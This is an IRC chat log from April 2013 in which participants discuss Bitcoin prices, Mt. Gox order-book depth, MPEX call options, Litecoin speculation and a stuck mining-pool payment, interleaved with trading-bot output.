BTC [-] Apr 02 20:27:05 [BTCTC] [MININGCO.ETF] 2 @ 0.639 = 1.278 BTC [-] Apr 02 20:30:46 btc-e it finally broke.. greeted by clodflare Apr 02 20:36:49 [BTCTC] [S.DICE-PT] 300 @ 0.00475 = 1.425 BTC [-] Apr 02 20:38:58 some big walls at 108 Apr 02 20:44:18 there are a couple really great articles Apr 02 20:44:33 the new yorker actually wrote the best article on bitcoin i've seen so far Apr 02 20:44:55 http://www.newyorker.com/online/blogs/elements/2013/04/the-future-of-bitcoin.html Apr 02 20:46:42 pellucid Apr 02 20:46:46 leave it to the new yorker Apr 02 20:47:07 i know right Apr 02 20:47:16 well written, and very nice Apr 02 20:47:27 benkay: i think i came across some of your open source code on github Apr 02 20:47:36 don't even think it was bitcoin related either, very cool Apr 02 20:47:57 [BTCTC] [ASICMINER-PT] 20 @ 0.75 = 15 BTC [-] Apr 02 20:48:01 [BTCTC] [ASICMINER-PT] 1 @ 0.74 BTC [-] Apr 02 20:48:06 [BTCTC] [ASICMINER-PT] 49 @ 0.737 = 36.113 BTC [-] Apr 02 20:51:30 The 2011 article by them on who Satoshi Nakamoto might be was fascinating. I'm convinced its the Irish dude. Apr 02 20:51:37 ;;bids 0 Apr 02 20:51:38 There are currently 31144769 bitcoins demanded at or over 0.0 USD, worth 10530749.2325 USD in total. | Data vintage: 36.4908 seconds Apr 02 20:52:06 what is everyone doing with the ;;bids 0 ? Apr 02 20:52:14 it's meaningless, no? Apr 02 20:52:36 10 million worth of bids Apr 02 20:52:45 but yeah, a bunch of garbage bids Apr 02 20:53:22 I think its meaningful Apr 02 20:53:34 well, i mean a bunch of people can put bids at $1... Apr 02 20:53:35 10.53 milion in real bids on mtgox Apr 02 20:53:40 they are all funded Apr 02 20:53:48 its just a proxy for how much cash is sitting on gox Apr 02 20:53:49 yes, but may never be even close to filled Apr 02 20:53:55 that makes sense Apr 02 20:54:07 $10.53 million is an all time high Apr 02 20:54:13 really? nice Apr 02 20:54:19 highest I have seen Apr 02 20:55:10 maybe gox will provide api for queue length, too :D Apr 02 20:55:30 ppl waiting to be confirmed Apr 02 20:56:05 that would be another great indicator Apr 02 20:56:07 It was in the 6000's last week, anyone have any fresher #s? Apr 02 20:56:12 9600 on reddit today Apr 02 20:56:15 ;;nethash Apr 02 20:56:16 62793.9424031 Apr 02 20:56:16 jeebus Apr 02 20:56:18 9600! Apr 02 20:56:22 yup Apr 02 20:56:25 yep Apr 02 20:56:28 i saw that too Apr 02 20:56:30 craziness Apr 02 20:56:30 get on the fucking train, but wait in line! Apr 02 20:56:41 No point in sellin Apr 02 20:56:45 yet. Apr 02 20:56:49 segments on CNBC two days in a row Apr 02 20:56:54 its starting to get weird Apr 02 20:56:55 those are people waiting to get verified by gox? Apr 02 20:57:00 everyone is talking about bitcoins Apr 02 20:57:18 So the total bids cash number had a big dip prior to the 25% flash crash on March 22nd, thus I consider it a possible indictor of short term direction. Apr 02 20:57:27 freelancer.com dying too, waht is with the internetz???? Apr 02 20:57:34 [BTCTC] [BASIC-MINING] 1 @ 0.3511 BTC [-] Apr 02 20:57:50 too much internet on the internet Apr 02 20:58:02 110 is not going to last more than a few hours now Apr 02 20:58:38 its getting eaten into WHILE outstanding bid $ is increasing. Apr 02 20:58:52 could go any minute now actually Apr 02 20:58:57 what does that mean? Apr 02 20:59:03 rage? Apr 02 20:59:24 Note: big bubble run-ups *begin* with a lot of media attention. As in, going hyperbolic from *here*. See start of 3rd phase on chart http://people.hofstra.edu/jean-paul_rodrigue/images/bubblesandmanias.gif Apr 02 20:59:29 "media attention" Apr 02 20:59:42 [BTCTC] [ASICMINER-PT] 6 @ 0.759999 = 4.56 BTC [+] Apr 02 20:59:45 [BTCTC] [ASICMINER-PT] 36 @ 0.76 = 27.36 BTC [+] Apr 02 20:59:48 [BTCTC] [ASICMINER-PT] 1 @ 0.769 BTC [+] Apr 02 20:59:51 [BTCTC] [ASICMINER-PT] 10 @ 0.76999 = 7.6999 BTC [+] Apr 02 20:59:52 i think BTC just cant be enslaved to normal rules Apr 02 21:00:02 if people keep buying in, the foundation keeps rising Apr 02 21:00:04 [BTCTC] [ASICMINER-PT] 10 @ 0.77 = 7.7 BTC [+] Apr 02 21:00:05 I just mean we're not in the actual bubble yet. Apr 02 21:00:20 it's a bubble alright Apr 02 21:00:25 but could be a HUGE one Apr 02 21:00:33 Right. This is still early days. Apr 02 21:00:59 thickasthieves, agreed Apr 02 21:01:19 i dont think the world bubble applies to bitcoin tho Apr 02 21:01:27 ;;bids 0 Apr 02 21:01:27 There are currently 31144690 bitcoins demanded at or over 0.0 USD, worth 10545333.4115 USD in total. | Data vintage: 27.5381 seconds Apr 02 21:01:47 buy your calls now boys :) MP's got this round! :) Apr 02 21:02:03 BitHub: I think it will apply - things will get insane before they settle down. Apr 02 21:02:11 i bought last month already xD Apr 02 21:02:24 and got them upgraded Apr 02 21:02:26 hmmm Apr 02 21:02:32 for me bubble begins at 1000 Apr 02 21:02:34 on it Apr 02 21:02:52 the only way current call options go down in price is if $avg goes down for long enough right? Apr 02 21:03:43 $avg Apr 02 21:03:45 ThickAsThieves: 104.33 Apr 02 21:04:08 [BTCTC] [BTC-BOND] 5 @ 0.0099 = 0.0495 BTC [-] Apr 02 21:04:08 they come down over time Apr 02 21:04:16 [BTCTC] [ASICMINER-PT] 9 @ 0.769 = 6.921 BTC [-] Apr 02 21:04:24 even if price keeps rising? Apr 02 21:04:44 well, calls rise with the price too Apr 02 21:04:54 [BTCTC] [ASICMINER-PT] 20 @ 0.77 = 15.4 BTC [+] Apr 02 21:05:22 [BTCTC] [ASICMINER-PT] 7 @ 0.77995 = 5.4597 BTC [+] Apr 02 21:05:37 depends on the rate of the rise Apr 02 21:06:10 ive only seen them go up so far this month Apr 02 21:06:15 all 2 days Apr 02 21:06:26 It's a Festivus miracle! Apr 02 21:06:33 4 days i guess Apr 02 21:06:33 If everything stays steady... Calls at the current strike price will lose about 5% of value per day Apr 02 21:07:03 although usually that is back end loaded (faster decay near the end of the period). Apr 02 21:07:09 [BTCTC] [ASICMINER-PT] 1 @ 0.779998 BTC [+] Apr 02 21:07:12 [BTCTC] [ASICMINER-PT] 10 @ 0.779998 = 7.8 BTC [+] Apr 02 21:07:14 I don't think steady will happen this month. Apr 02 21:07:34 hasnt been steady since before 50 Apr 02 21:07:38 i think Apr 02 21:07:43 yeah Apr 02 21:07:57 looking at calls for $200 Apr 02 21:08:00 for next month Apr 02 21:08:33 heheh Apr 02 21:08:37 LEVERAGE Apr 02 21:09:02 you can let your options carry over? Apr 02 21:09:07 how does that work Apr 02 21:09:08 the N's carry over Apr 02 21:09:12 ah Apr 02 21:09:38 do you mix the 2 Bugpowder T & N? Apr 02 21:10:05 nope, I go front month Apr 02 21:10:11 less time premium Apr 02 21:10:14 the time decay is huge Apr 02 21:10:17 less expensive Apr 02 21:10:20 more leverage Apr 02 21:10:22 higher risk Apr 02 21:10:25 yeah, i agree with bugpowder Apr 02 21:10:42 but i was hoping that if you get the highest strike it would not be so much, but still like a $20 option Apr 02 21:11:06 The calls are probably all underpriced, given the trend Apr 02 21:11:21 I saw that options of 191 are the same price as 200 Apr 02 21:11:28 although one day it will reverse and we will all eat it Apr 02 21:11:32 i think the bot may be a bit more careful this month, the spread seems wider Apr 02 21:11:42 an hour ago, even those at 182 were the same as 200 Apr 02 21:12:15 If you want max leverage, go for the strike that is 1 strike inside the 'lower limit' price. Apr 02 21:12:31 what is the 'lower limit' price? Apr 02 21:12:34 for example? Apr 02 21:12:50 ie the C188Ts Apr 02 21:13:11 the bot has a built in lower limit for what it will sell for, to guard against extreme long tail moves. Apr 02 21:13:36 can you say differently : 1 strike inside the 'lower limit' price Apr 02 21:14:00 what if you sell puts instead? Apr 02 21:14:11 i think i got it Apr 02 21:14:31 precisely bugpowder Apr 02 21:14:46 but 188 still needs like 198 price to cover Apr 02 21:14:52 which could be far away Apr 02 21:15:20 max leverage is max risk of total loss of course Apr 02 21:15:45 $oix Apr 02 21:15:47 i'm confident in price rise, but double in one month is iffy Apr 02 21:15:48 [BTCTC] [BTC-BOND] 1 @ 0.00984 BTC [-] Apr 02 21:15:50 but its the only way to get a 15x on your bet Apr 02 21:15:53 yeah Apr 02 21:16:04 i will settle for 6X Apr 02 21:16:40 gwa, i'm going to have to make an $oix command now Apr 02 21:16:55 too many people keep trying to use it Apr 02 21:17:01 ;;ticker Apr 02 21:17:02 BTCUSD ticker | Best bid: 108.76000, Best ask: 108.83000, Bid-ask spread: 0.07000, Last trade: 108.83000, 24 hour volume: 73582.22634863, 24 hour low: 99.00000, 24 hour high: 108.85699, 24 hour vwap: 104.61796 Apr 02 21:17:06 anyone cares to explain mepx to him? http://qz.com/69630/how-to-short-bitcoins-if-you-really-must/ Apr 02 21:17:11 *mpex Apr 02 21:17:56 mjr_ selling puts is a little murky Apr 02 21:18:00 or drop coinbr ref link Apr 02 21:18:18 [BTCTC] [BTC-TRADING-PT] 2 @ 0.168 = 0.336 BTC [-] Apr 02 21:19:51 mjr_: because the deposit capital requirements for puts are not precisely reported Apr 02 21:19:54 [HAVELOCK] [SDICE] 5 @ 0.3801 = 1.9005 BTC [-] Apr 02 21:20:20 to get 15x your bet with 188T will need a price of ~854? Apr 02 21:20:21 If deposit requirements were equal, than you want to short the most expensive puts for max possible gain Apr 02 21:20:34 bitesssak: yes but it is POSSIBLE Apr 02 21:20:38 impossible with the 150s Apr 02 21:20:54 [HAVELOCK] [SDICE] 5 @ 0.38 = 1.9 BTC [-] Apr 02 21:21:18 you can plug the equations into matlab or google docs to figure out your crossover point. Namworld should probably do this, it would make his calculator more useful Apr 02 21:21:39 [BTCTC] [BTC-TRADING-PT] 1 @ 0.186 BTC [+] Apr 02 21:21:42 [BTCTC] [BTC-TRADING-PT] 4 @ 0.1869 = 0.7476 BTC [+] Apr 02 21:21:45 [BTCTC] [BTC-TRADING-PT] 4 @ 0.19 = 0.76 BTC [+] Apr 02 21:21:53 mjr_: but deposit requirements increase for puts that are deeper in the money. I haven't yet figured out the optimal play there. Apr 02 21:22:08 I suspect it is still to short the most expensive ones. Apr 02 21:22:18 [BTCTC] [BTC-TRADING-PT] 1 @ 0.2 BTC [+] Apr 02 21:22:35 Bugpowder_: yeah thats what i was thinking Apr 02 21:25:40 latest CNBC vid http://video.cnbc.com/gallery/?play=1&video=3000157766 Apr 02 21:25:54 [HAVELOCK] [SDICE] 20 @ 0.379999 = 7.6 BTC [-] Apr 02 21:27:32 [BTCTC] [BTC-BOND] 6 @ 0.00983 = 0.059 BTC [-] Apr 02 21:33:17 Looking to borrow USD on Bitstamp or MtGox more info at https://bitcointalk.org/index.php?topic=164907 Apr 02 21:33:31 again?!? Apr 02 21:33:57 oh, still waiting... Apr 02 21:36:26 ;;asks 109.99 Apr 02 21:36:27 There are currently 4766.1097 bitcoins offered at or under 109.99 USD, worth 520053.88321 USD in total. | Data vintage: 30.1631 seconds Apr 02 21:36:37 ;;bids 0 Apr 02 21:36:37 There are currently 30933900 bitcoins demanded at or over 0.0 USD, worth 10496396.4646 USD in total. | Data vintage: 40.7205 seconds Apr 02 21:36:52 WTF Apr 02 21:37:03 oh nvm i thought that was asks Apr 02 21:37:14 ;;asks 10000 Apr 02 21:37:15 There are currently 41869.349 bitcoins offered at or under 10000.0 USD, worth 14600578.5014 USD in total. | Data vintage: 77.8940 seconds Apr 02 21:37:26 ok still wtf Apr 02 21:37:36 it was 10 mil like half hour ago Apr 02 21:37:48 the cash at gox is huge right now Apr 02 21:38:01 https://www.youtube.com/watch?v=5yiLR4IAByc no sleep makes me feel good Apr 02 21:38:30 hurts my ears Apr 02 21:39:28 pressure keeps building Apr 02 21:39:55 i jumped on the litecoin train Apr 02 21:40:04 might as well go where the levereage is Apr 02 21:40:07 ;;market --buy 1000 Apr 02 21:40:09 A market order to buy 1000 bitcoins right now would take 108976.2633 USD and would take the last price up to 108.9800 USD, resulting in an average price of 108.9763 USD/BTC. | Data vintage: 0.0001 seconds Apr 02 21:40:19 ;;market --sell 1000 Apr 02 21:40:19 A market order to sell 1000 bitcoins right now would net 108125.4045 USD and would take the last price down to 107.6869 USD, resulting in an average price of 108.1254 USD/BTC. | Data vintage: 10.6214 seconds Apr 02 21:42:58 taub: good luck Apr 02 21:43:11 people are going to get pounded on that . Apr 02 21:44:39 yea, so far made a couple of good trades Apr 02 21:44:43 Bugpowder_: what's the move? still calls? Apr 02 21:44:45 positioning myself on the edges Apr 02 21:44:48 lol Apr 02 21:44:59 Bugpowder_: is a guru listen to him Apr 02 21:45:01 sure why not Apr 02 21:45:04 more calls Apr 02 21:45:09 I should have bought LTC though Apr 02 21:45:14 i looked at buying both calls and puts Apr 02 21:45:16 but they cancel out :( Apr 02 21:45:19 when goat mentioned it yesterday morning Apr 02 21:45:22 he is like the biggest btc investor ive seen Apr 02 21:45:38 there are definitely whales with 10x my bankroll doing options trades Apr 02 21:45:38 hits option book was like if you buy both directions you can make profit no matter what direction the price goes Apr 02 21:45:41 at least 2 Apr 02 21:45:41 as logng as it moves Apr 02 21:45:54 taub its called a straddle Apr 02 21:46:03 hard when the option price is so freaking high Apr 02 21:46:08 yea Apr 02 21:46:10 what i figured Apr 02 21:46:28 pretty much cancels itself out Apr 02 21:46:32 its basically a bet on INCREASING volatility Apr 02 21:46:33 option prices will decay over time Apr 02 21:46:39 best time to buy is end month Apr 02 21:46:48 YEAHHHHH Apr 02 21:46:55 ic Apr 02 21:47:05 calllllls Apr 02 21:47:06 i bought early :/ Apr 02 21:47:10 we'll see i guess Apr 02 21:47:15 yeah, straddles are expensive in btc Apr 02 21:47:17 someonek nows what he uses at the risk free rate of return? Apr 02 21:47:27 so i can test stuff n the bs model Apr 02 21:47:33 btw - nobody hate me when this shit finally reverses and everyone has calls. Apr 02 21:47:55 we already hate you for taking all our bond money remember ;) Apr 02 21:48:30 lol Apr 02 21:48:36 BOOOOYAH Apr 02 21:48:41 zoinks scoob Apr 02 21:50:02 Now see this. Apr 02 21:50:05 bids ;;0 Apr 02 21:50:09 ;;bids 0 Apr 02 21:50:10 There are currently 30931480 bitcoins demanded at or over 0.0 USD, worth 10260638.5802 USD in total. | Data vintage: 20.2586 seconds Apr 02 21:50:26 someone with 250k got impatient Apr 02 21:50:35 pulled his bid and bought to market Apr 02 21:50:45 tends to happen at the walls Apr 02 21:51:05 because then you don't push the price higher until the wall falls Apr 02 21:51:29 as soon as we hit the 108.98 wall, he dropped his bid and ate the wall. Apr 02 21:55:46 there really is no point in other cryptos.. Apr 02 21:55:51 is there? Apr 02 21:55:59 51% vul maybe Apr 02 21:58:25 hey where did the wall at 112 go? Apr 02 21:58:35 lol Apr 02 21:58:40 jesus. http://bitcoincharts.com/charts/mtgoxUSD/accumulated_orderbook.png Apr 02 21:58:42 THIN Apr 02 21:58:43 they disappear whenever we get close lol Apr 02 21:59:29 Bugpowder_, where was his bid before? Apr 02 22:00:09 rally time Apr 02 22:00:09 saulimus: not sure, wasn't watch closely Apr 02 22:00:39 115/114 not far Apr 02 22:00:46 but the sudden drop in total bid $ coupled with the big market buy strongly suggests it was a single buyer. Apr 02 22:00:53 [HAVELOCK] [VTX] 4 @ 0.56699 = 2.268 BTC [-] Apr 02 22:00:54 ;;ticker Apr 02 22:00:56 the asks are SO THIN right now Apr 02 22:01:00 BTCUSD ticker | Best bid: 109.80110, Best ask: 110.00000, Bid-ask spread: 0.19890, Last trade: 110.00000, 24 hour volume: 79316.48734208, 24 hour low: 99.00000, 24 hour high: 110.00000, 24 hour vwap: 105.05549 Apr 02 22:01:13 110 consumed Apr 02 22:01:21 gulp Apr 02 22:01:27 makes me nervous that guy with the wall at 112 is gonna do a market sell of a few thousands coins though.. Apr 02 22:01:30 may not happen though Apr 02 22:01:37 whats that site where you can do depth playback again? Apr 02 22:01:45 111 Apr 02 22:01:51 i was surprised to see that the thinner depth would eat up the heavy walls Apr 02 22:01:54 [HAVELOCK] [HIM] 1 @ 2.044 BTC [-] Apr 02 22:01:55 bitcoinity has some depth history Apr 02 22:02:03 coinlab.com Apr 02 22:02:04 but not enough for this purpose Apr 02 22:02:12 [BTCTC] [ASICMINER-PT] 1 @ 0.779 BTC [-] Apr 02 22:02:14 ty dub Apr 02 22:02:40 coinlab is too smoothed out Apr 02 22:02:52 [HAVELOCK] [VTX] 1 @ 0.56699 BTC [-] Apr 02 22:03:01 ;;bids 0 Apr 02 22:03:04 There are currently 30931488 bitcoins demanded at or over 0.0 USD, worth 10330339.7285 USD in total. | Data vintage: 0.0107 seconds Apr 02 22:03:39 nm, i was wrong Apr 02 22:03:47 steeper and pointier wins Apr 02 22:03:54 http://coinlab.com/liquidity Apr 02 22:04:42 okay a wall is steepest of course... questions questions Apr 02 22:04:53 [HAVELOCK] [SDICE] 10 @ 0.381 = 3.81 BTC [+] Apr 02 22:04:54 [HAVELOCK] [SDICE] 4 @ 0.38 = 1.52 BTC [-] Apr 02 22:04:55 [HAVELOCK] [SDICE] 1 @ 0.37 BTC [-] Apr 02 22:04:57 [HAVELOCK] [SDICE] 2 @ 0.3611 = 0.7222 BTC [-] Apr 02 22:04:58 [HAVELOCK] [SDICE] 1 @ 0.3610002 BTC [-] Apr 02 22:04:59 [HAVELOCK] [SDICE] 8 @ 0.36100001 = 2.888 BTC [-] Apr 02 22:05:00 [HAVELOCK] [SDICE] 14 @ 0.361 = 5.054 BTC [-] Apr 02 22:05:54 [HAVELOCK] [SDICE] 6 @ 0.361 = 2.166 BTC [-] Apr 02 22:05:56 [BTCTC] [ASICMINER-PT] 1 @ 0.779998 BTC [+] Apr 02 22:06:44 mircea_popescu, add some strikes, quick Apr 02 22:08:24 call options are already 10% more expensive than yesterday Apr 02 22:08:30 $avg Apr 02 22:08:32 ThickAsThieves: 104.84 Apr 02 22:08:38 =O Apr 02 22:14:27 95eur soon Apr 02 22:14:28 lewl Apr 02 22:15:12 ;;bc,convert eur Apr 02 22:15:13 mined 95 bytecoin blocks overnight Apr 02 22:15:13 1 BTC = 111.00000 U.S. dollars = 86.4149475 Euros Apr 02 22:15:35 way overbought? Apr 02 22:15:40 seems like it Apr 02 22:15:59 unless eurusd follows btceur lol Apr 02 22:16:13 does mpex support litecoin Apr 02 22:16:49 ;;ticker Apr 02 22:16:50 BTCUSD ticker | Best bid: 110.98903, Best ask: 111.46900, Bid-ask spread: 0.47997, Last trade: 110.00000, 24 hour volume: 79381.21726820, 24 hour low: 99.00000, 24 hour high: 111.50000, 24 hour vwap: 105.18525 Apr 02 22:17:53 [HAVELOCK] [VTX] 4 @ 0.53 = 2.12 BTC [-] Apr 02 22:18:25 jcpham: nop :( Apr 02 22:18:42 darn Apr 02 22:19:07 i still dont see a point in ltc Apr 02 22:19:10 beyond pump n dump Apr 02 22:19:51 i read an article where someone proposed that litecoin was the only bitcoin hedge avaialble Apr 02 22:19:56 gives GPU miners a way to make $ Apr 02 22:19:58 their wording was better and made more sense Apr 02 22:20:12 but money should flow to litecoin as btc rises Apr 02 22:20:16 21:20.03 ( ThickAsThieves ) gives GPU miners a way to make $ < - that is just bullshit Apr 02 22:20:29 certainly is making me some Apr 02 22:20:55 it doesnt have to make sense for it to be true Apr 02 22:21:03 ya well its no good as a reason why ltc is good for Apr 02 22:21:21 i'm not saying it has any value other than antural hedge against bitcoin Apr 02 22:21:26 the only hedge Apr 02 22:21:28 ppcoin is the new hotness anyway Apr 02 22:21:36 meh hedge Apr 02 22:21:39 up 400% or so in 24h Apr 02 22:21:41 i feel you Apr 02 22:21:45 i hate using the word Apr 02 22:22:17 prediction: litecoin always suges with bitcoin Apr 02 22:22:20 *surges Apr 02 22:22:53 dunno i think ltc price is powered by human stupidity which is infinite Apr 02 22:22:55 twas the opposite a few weeks ago Apr 02 22:22:57 maybe i should buy in. Apr 02 22:22:58 LTC is a pump and dump. I'm suprised it got so high. Who knows how high it will go, but its gonna be like bitcoin bubble #1. Apr 02 22:23:07 kakobrekla: lolol Apr 02 22:23:36 yesterday you would have been a fool to buy in, a fool that doubled his money today Apr 02 22:23:41 :/ Apr 02 22:23:42 i'm not disagreeing with the things you are saying Apr 02 22:23:44 that's how bubbles get started.. Apr 02 22:24:09 and by all logic it should crash Apr 02 22:24:28 but I'm thinking the bitcoin bears move to litecoin during a raly Apr 02 22:24:37 well, bitcoin is still up after 4 years Apr 02 22:24:40 dont trade on bitcoin24 Apr 02 22:24:42 so everytime bitcoin surges excpect the same from litecoin Apr 02 22:24:43 if you got cash Apr 02 22:24:45 get it the fuck out Apr 02 22:24:55 all im gonna say Apr 02 22:25:28 whenever someone says that in bitcoinland Apr 02 22:25:34 I take their advice Apr 02 22:25:43 and usually I save my ass Apr 02 22:26:04 theres ar erason the hotwallet is always empty Apr 02 22:27:21 surely someone is waiting for 5000 coin transfer to clear on mtgox right now... Apr 02 22:27:26 for the next dump Apr 02 22:28:19 [MPEX] [O.USD.C188T] 380 @ 0.05330171 = 20.2546 BTC Apr 02 22:29:32 heheh Apr 02 22:31:30 ;;ticker Apr 02 22:31:30 oO Apr 02 22:31:30 BTCUSD ticker | Best bid: 110.99999, Best ask: 111.55471, Bid-ask spread: 0.55472, Last trade: 111.55471, 24 hour volume: 79769.73383333, 24 hour low: 99.00000, 24 hour high: 111.98000, 24 hour vwap: 105.30564 Apr 02 22:37:09 [MPEX] [S.MPOE] 9800 @ 0.00067413 = 6.6065 BTC [-] Apr 02 22:38:56 /join #devops Apr 02 22:38:59 GODDAMNIT Apr 02 22:42:03 As some of these Call Options are flat in price at the end of the tails, it should be possible to ride much lower calls part of the way and jump onto the higher Calls? Apr 02 22:44:01 oh my Apr 02 22:44:16 trading options is going to be painful due to the spread Apr 02 22:44:29 that was easy.... Apr 02 22:45:18 112.48 Apr 02 22:45:55 not much resistance Apr 02 22:46:00 113 Apr 02 22:46:33 ;;goxlag Apr 02 22:46:34 46.100693 seconds Apr 02 22:46:39 ;;ticker Apr 02 22:46:39 BTCUSD ticker | Best bid: 112.72500, Best ask: 113.00000, Bid-ask spread: 0.27500, Last trade: 113.00000, 24 hour volume: 79840.93897341, 24 hour low: 99.00000, 24 hour high: 111.98000, 24 hour vwap: 105.34531 Apr 02 22:47:26 dear lord.... Apr 02 22:48:09 if goxlag > goxprice = buy Apr 02 22:48:19 lol Apr 02 22:48:21 lol Apr 02 22:48:29 ;;goxlag Apr 02 22:48:30 10.92388 seconds Apr 02 22:48:34 ;;ticker Apr 02 22:48:35 BTCUSD ticker | Best bid: 112.47500, Best ask: 113.65647, Bid-ask spread: 1.18147, Last trade: 113.39550, 24 hour volume: 79840.93897341, 24 hour low: 99.00000, 24 hour high: 111.98000, 24 hour vwap: 105.34531 Apr 02 22:48:54 120 today? Apr 02 22:48:59 seconds? Apr 02 22:49:01 for sure Apr 02 22:49:05 ;;asks 119.99 Apr 02 22:49:06 There are currently 5007.2956 bitcoins offered at or under 119.99 USD, worth 592094.09086 USD in total. | Data vintage: 54.3718 seconds Apr 02 22:49:37 love that tastey vintage data Apr 02 22:49:38 i have txn in my -qt Apr 02 22:49:45 that isn't showing on blockchain Apr 02 22:49:52 who wants to explain what is happening Apr 02 22:49:54 [HAVELOCK] [SDICE] 3 @ 0.352 = 1.056 BTC [-] Apr 02 22:49:55 [HAVELOCK] [SDICE] 10 @ 0.351 = 3.51 BTC [-] Apr 02 22:49:57 [HAVELOCK] [SDICE] 28 @ 0.35 = 9.8 BTC [-] Apr 02 22:50:02 it's a fork!!! Apr 02 22:50:07 i stopped using the client Apr 02 22:50:12 its borked imo Apr 02 22:50:22 Status: 0/unconfirmed Apr 02 22:50:23 Date: 2 Apr 2013 06:01 Apr 02 22:50:23 From: unknown Apr 02 22:50:30 Credit: 0.27 BTC Apr 02 22:50:30 Net amount: +0.27 BTC Apr 02 22:50:30 Transaction ID: 7491ead91045944c7135dc2398a68bdb8b18a1d9806a9abb5d5614d104450fee Apr 02 22:50:48 wait it's in the future Apr 02 22:50:53 i'm confused Apr 02 22:51:34 you can schedule txns for the future Apr 02 22:51:42 i think that is what this is Apr 02 22:51:49 it's a pool payment from derpbit Apr 02 22:52:00 it's been sitting in my vlient unconfirmed all day Apr 02 22:52:18 From should say 1Vayner.... Apr 02 22:52:25 instead of unknown Apr 02 22:52:35 uh dont use deepbit Apr 02 22:52:35 april 2 six in the am already happened Apr 02 22:52:41 derp Apr 02 22:52:50 i failed over there last week Apr 02 22:52:56 anyways Apr 02 22:53:25 i have 8 cons Apr 02 22:53:34 block count is right Apr 02 22:53:38 what gives Apr 02 22:54:07 [MPEX] [S.MPOE] 5000 @ 0.00067538 = 3.3769 BTC [+] Apr 02 22:54:11 [MPEX] [S.MPOE] 6918 @ 0.00067539 = 4.6723 BTC [+] Apr 02 22:56:53 [HAVELOCK] [SDICE] 3 @ 0.35 = 1.05 BTC [-] Apr 02 22:56:54 ;;nethash Apr 02 22:56:54 62648.0975541 Apr 02 22:57:38 this should be interesting... not alot of coin between here and 150 Apr 02 22:58:18 tired of Chrome telling me i wanna search Clark Howard when i type clark moody Apr 02 22:58:23 jcpham: deepbutt has all kinds of broken iirc Apr 02 22:58:31 tycho hasn Apr 02 22:58:38 ic Apr 02 22:58:41 chrome has gotten a little too forceful with its replacements Apr 02 22:58:48 't done any maint on it in a long time Apr 02 22:58:55 i need to update my cgminer configs in the worst way Apr 02 22:59:04 115 Apr 02 22:59:52 at this rate i'll be in the money on my options tomorrow Apr 02 23:00:03 :/ Apr 02 23:00:19 hahaha Apr 02 23:00:26 damn, i should have gotten those 188 calls Apr 02 23:00:28 $avg Apr 02 23:00:30 thestringpuller: 105.47 Apr 02 23:00:35 cool Apr 02 23:00:54 jcpham , that transaction number does not look right Apr 02 23:00:59 id Apr 02 23:01:03 copy it again Apr 02 23:01:12 i've copied it a bunch Apr 02 23:01:15 [BTCTC] [BTC-BOND] 1 @ 0.009999 BTC [+] Apr 02 23:01:15 it isn't right Apr 02 23:01:27 ;;goxlag Apr 02 23:01:28 199.623015 seconds Apr 02 23:01:32 Transaction ID: 7491ead91045944c7135dc2398a68bdb8b18a1d9806a9abb5d5614d104450fee Apr 02 23:01:40 you still can get those 188 calls Apr 02 23:01:45 notice how I'm copying the full dialoge output Apr 02 23:01:53 [HAVELOCK] [VTX] 2 @ 0.56 = 1.12 BTC [+] Apr 02 23:02:02 in my client that is showing a invalid transaction id Apr 02 23:02:17 on blockchain it shows the same Apr 02 23:02:25 blockchain.info Apr 02 23:02:34 yeah, i looked there also Apr 02 23:02:40 how can i have an invalid txn Apr 02 23:03:03 from 9 hours ago Apr 02 23:03:11 what address was it sent from Apr 02 23:03:14 [MPEX] [O.USD.C107T] 30 @ 0.23047712 = 6.9143 BTC Apr 02 23:03:18 says unknown Apr 02 23:03:30 i'm guessing it is a deepbit payment Apr 02 23:03:33 what address to you get payment to Apr 02 23:03:37 from derpbit Apr 02 23:03:43 the amount and address looks like a deepbit payment Apr 02 23:03:44 put that in blockchain Apr 02 23:03:54 don't want to share that one Apr 02 23:03:58 i'll check Apr 02 23:04:21 but it is the default address or the first address of this wallet Apr 02 23:04:36 your address used to recive payment Apr 02 23:04:41 receive Apr 02 23:04:46 sp Apr 02 23:04:54 [HAVELOCK] [VTX] 1 @ 0.56 BTC [+] Apr 02 23:04:56 nope it isn't there Apr 02 23:04:56 finally a wall at 117 Apr 02 23:05:02 ;;calc (130-107)/130 Apr 02 23:05:03 0.176923076923 Apr 02 23:05:07 the txns before that confirmed is there Apr 02 23:05:10 but not this one Apr 02 23:05:21 these calls wont pay off right now... Apr 02 23:05:28 ;;calc (140-107)/140 Apr 02 23:05:29 0.235714285714 Apr 02 23:05:47 hmm, so your address that you use to get payments from deepbit - does not show incoming .27 Apr 02 23:06:13 not this txn, no Apr 02 23:06:38 log into deepbit and make sure your address has not been changed Apr 02 23:06:51 I don't use them so IDK how they do payouts Apr 02 23:07:01 locked Apr 02 23:07:19 your account is locked? Apr 02 23:07:26 impossibru to change my payment address Apr 02 23:07:32 ah, ok Apr 02 23:07:38 oic Apr 02 23:07:46 it shows in the pool payments Apr 02 23:07:52 i'll bother them, they fucked up Apr 02 23:08:03 it must not have been sent yet, is the only logical conclusion Apr 02 23:08:11 Lyspooner what ?! Apr 02 23:08:12 ;;ticker Apr 02 23:08:13 BTCUSD ticker | Best bid: 114.10001, Best ask: 114.96000, Bid-ask spread: 0.85999, Last trade: 114.10000, 24 hour volume: 81517.68467091, 24 hour low: 99.00000, 24 hour high: 116.00000, 24 hour vwap: 105.78868 Apr 02 23:08:20 heh. Apr 02 23:08:48 ;;calc (199-188)/199 Apr 02 23:08:48 0.0552763819095 Apr 02 23:09:19 you posted not too long ago, mircea_popescu, that these types of monthly gains shouldn't be that surprising if this crazy currency was to become widely accepted Apr 02 23:09:38 yes well... Apr 02 23:09:40 judging by your lack of 300, 400 and 1000 calls Apr 02 23:09:45 i'm not sure you believe yourself Apr 02 23:09:46 oh shut up Apr 02 23:09:56 one naming convention change OPER YEAR is insanity Apr 02 23:10:15 LOL Apr 02 23:10:26 i have to admit i started feeling limited by 200 Apr 02 23:10:34 >.< Apr 02 23:10:55 i am now the bitcoin laughingstock ;/ Apr 02 23:10:59 finance win. fml. Apr 02 23:11:06 lol Apr 02 23:11:20 lol Apr 02 23:11:29 mircea will crash it. so that options won't need renaming again Apr 02 23:11:36 pronly Apr 02 23:11:41 probly* Apr 02 23:11:45 lol Apr 02 23:12:00 yeah pls dont go to 200 Apr 02 23:12:11 it fuckin up errything Apr 02 23:12:18 You guys have about a week to adjust for 500 Apr 02 23:12:21 sorry! Apr 02 23:12:32 it is, this is not productive - climbing this fast Apr 02 23:12:38 http://ji.gy is an -otc options thingy Apr 02 23:12:40 it is going to hurt Apr 02 23:12:45 i can assist you with it though Apr 02 23:12:48 